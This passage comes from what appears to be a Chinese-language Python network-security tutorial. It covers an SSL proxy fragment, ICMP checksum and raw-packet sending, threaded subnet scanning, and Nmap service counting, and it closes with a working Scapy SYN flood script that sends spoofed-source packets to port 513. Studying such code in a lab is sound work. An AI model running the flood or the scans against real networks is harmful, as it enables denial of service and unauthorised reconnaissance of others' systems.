        Returns True when the socket was wrapped, False otherwise.
        """
        if b'\x01\x00\x00\x00' in data:
            self.proxySocket = self.ssl_context.wrap_socket(self.proxySocket, server_side=True )
            print ("[proxyClient]ssl neogotiation" )
            return True
        else :
            return False

if __name__ == "__main__" :
    # Both threads are daemons; the process lives as long as proxySrv runs.
    proxyCli = proxyClient()
    proxyCli.daemon = True
    proxyCli.start()
    proxySrv = proxyServer()
    proxySrv.daemon = True
    proxySrv.start()
    proxySrv.join()
计算ICMP校验和: 校验和的目的是计算数据包完整性,防止数据包被非法损坏, 在ICMP数据包发送时,会自动计算校验和并将其设置到ICMP报文中,在目标设备收到后再次计算校验和,并与数据包中的校验和作比较,从而判断该ICMP包是否正常.
import os, sys


def icmp_chesksum(message):
    """Compute the 16-bit one's-complement checksum used by ICMP.

    Args:
        message: packet contents as ``bytes``/``bytearray``, or as a ``str``
            whose characters are taken as byte values.

    Returns:
        The checksum as an int, in the byte order that yields the wire value
        when packed big-endian. Recomputing over a message that already
        carries its checksum gives 0.
    """
    # Normalise to integers so both text and binary input are accepted.
    if isinstance(message, str):
        values = [ord(char) for char in message]
    else:
        values = list(message)

    length = len(values)
    mold_taking = length % 2
    total = 0
    # Sum 16-bit words, low byte first.
    for i in range(0, length - mold_taking, 2):
        total += values[i] + (values[i + 1] << 8)
    if mold_taking:
        total += values[-1]

    # Fold carries back in until the sum fits in 16 bits.
    while total >> 16:
        total = (total >> 16) + (total & 0xffff)

    answer = ~total & 0xffff
    # Swap the two bytes of the result.
    return answer >> 8 | (answer << 8 & 0xff00)


def get_check_sum():
    """Return the checksum of a sample echo request (id 1, sequence 1)."""
    icmp_type = "\x08"
    code = "\x00"
    checksum = "\x00\x00"  # the checksum field is zero while computing
    identifier = "\x00\x01"
    sequece = "\x00\x01"
    body = "abcdefghijklmnopqrstuvwabcdefghi"
    icmp_message = icmp_type + code + checksum + identifier + sequece + body
    return icmp_chesksum(icmp_message)


if __name__ == "__main__":
    checksum = get_check_sum()
    print("十进制校验和: {:d}".format(checksum))
发送ICMP原始数据包: 接着来实现构建并发送socket.SOCK_RAW原始数据包,发送的实现细节与上方解包原理完全一致.
import socket, time


def raw_socket(dst_addr, imcp_packet):
    """Send *imcp_packet* to *dst_addr* over a raw ICMP socket.

    Args:
        dst_addr: destination IPv4 address.
        imcp_packet: bytes to transmit.

    Returns:
        A ``(send_time, socket, dst_addr)`` tuple, where ``send_time`` is the
        ``time.time()`` value taken just before sending. The socket is left
        open for the caller.
    """
    protocol = socket.getprotobyname("icmp")
    handle = socket.socket(socket.AF_INET, socket.SOCK_RAW, protocol)
    sent_at = time.time()
    target = (dst_addr, 80)
    handle.sendto(imcp_packet, target)
    return sent_at, handle, dst_addr


if __name__ == "__main__":
    payload = bytes("hello lyshark", encoding="utf-8")
    send_request_time, rawsocket, dst_addr = raw_socket("8.141.58.64", payload)
    print("发送时间戳: {} --> 发送IP: {} --> 数据包句柄: {}".format(send_request_time, dst_addr, rawsocket))
寻找内网路由地址: 除了设置socket.SOCK_RAW原始数据包模式外,Python还可以设置socket.SOCK_STREAM数据流模式,使用该模式还可实现扫描内网主机分布情况.
例如: 通过本地网段计算出C段IP地址,然后调用Check方法扫描目标网段内是否存在80端口开放的主机.
import socket, threading

# (address, port) pairs that accepted a connection; guarded by ``lock``.
routers = []
lock = threading.Lock()


def search_router():
    """Probe port 80 on hosts .1-.254 of every local interface's /24.

    One thread is started per candidate address; the function returns once
    all probes have finished. Hits are printed and stored in ``routers``.
    """
    all_thread = []
    local_ip = socket.gethostbyname_ex(socket.gethostname())[2]
    print("本地接口: " + str(local_ip))
    for ip in local_ip:
        octets = ip.split('.')
        for i in range(1, 255):
            octets[3] = str(i)
            addr = '.'.join(octets)
            thread = threading.Thread(target=check, args=(addr,))
            thread.start()
            all_thread.append(thread)
    for item in all_thread:
        item.join()


def check(addr, port=80):
    """Record *addr* in ``routers`` if it accepts a TCP connection on *port*.

    Args:
        addr: IPv4 address to probe.
        port: TCP port to try (defaults to 80).
    """
    # The context manager closes the socket even if the probe raises.
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
        sock.settimeout(1)
        result = sock.connect_ex((addr, port))
    if result == 0:
        # ``with`` releases the lock even if printing fails.
        with lock:
            print("该网段路由器可能是: {}".format(addr))
            routers.append((addr, port))


if __name__ == "__main__":
    search_router()
Nmap 搜索网段主机并绘图: 首先电脑中必须安装Nmap,然后使用如下脚本统计内网主机数,并最后绘制饼图展示.
import os, nmap, time
import numpy as np
from matplotlib.pylab import *
from collections import Counter


def ScanPort(addr):
    """Scan *addr* with Nmap and chart how many hosts expose common services.

    Prints the open TCP ports of every host and a per-service summary, then
    saves a pie chart to ``scan.png`` when at least one tracked service was
    found.

    Args:
        addr: host or network expression understood by Nmap,
            e.g. ``"192.168.1.0/24"``.
    """
    port = []
    Nmap = nmap.PortScanner()
    try:
        ret = Nmap.scan(hosts=addr, arguments="-PS")
    except Exception:
        print("[-] Nmap 端口扫描异常,程序被迫终止.")
        # Non-zero status so callers can tell the scan failed.
        raise SystemExit(1)

    for item in Nmap.all_hosts():
        # Hosts without open TCP ports have no "tcp" entry.
        tcp_ports = ret.get("scan", {}).get(item, {}).get("tcp")
        if not tcp_ports:
            continue
        temp = list(tcp_ports.keys())
        print("[*] IP地址: %12s 开放端口: %s" % (item, temp))
        port.extend(temp)

    # Counter yields 0 for ports that were never seen, so the arithmetic
    # below cannot hit None.
    flag = Counter(port)
    dic = {
        "WebServer": flag[80],
        "MySQL": flag[3306],
        "SSH": flag[22],
        "MSSQL": flag[1433],
        "FTP": flag[21],
        "Danger": flag[135] + flag[139] + flag[445],
    }
    print("[+] 服务统计: {}".format(dic))

    label = list(dic.keys())
    fracs = list(dic.values())
    # A pie chart of all zeros is undefined; skip drawing in that case.
    if not [value for value in fracs if value]:
        return

    mpl.rcParams["font.sans-serif"] = ["KaiTi"]
    plt.axes(aspect=1)
    plt.pie(x=fracs, labels=label, autopct="%0d%%")
    plt.savefig("scan.png")


if __name__ == "__main__":
    ScanPort("192.168.1.0/24")
使用Scapy制造SYN洪泛攻击: 使用Scapy制造一些再有TCP协议层的IP数据包,让这些包TCP源端口不断地自增一,而目的TCP端口513不变。
from scapy.all import *

# NOTE(review): this script sends tens of thousands of TCP packets with a
# caller-chosen source address at a single host. Sending it to systems you do
# not own or are not authorised to test is a denial-of-service attack; keep it
# to an isolated lab.
def synFlood (src, tgt ):
    """Send one TCP packet per source port from 1024 to 65534 to port 513.

    Args:
        src: source IP address written into each packet.
        tgt: destination IP address.
    """
    for sport in range (1024 , 65535 ):
        IPlayer = IP(src=src, dst=tgt)
        TCPlayer = TCP(sport=sport, dport=513 )
        pkt = IPlayer / TCPlayer
        send(pkt)

# Runs immediately on import/execution with these fixed addresses.
src = "192.168.220.132"
tgt = "192.168.220.128"
synFlood(src, tgt)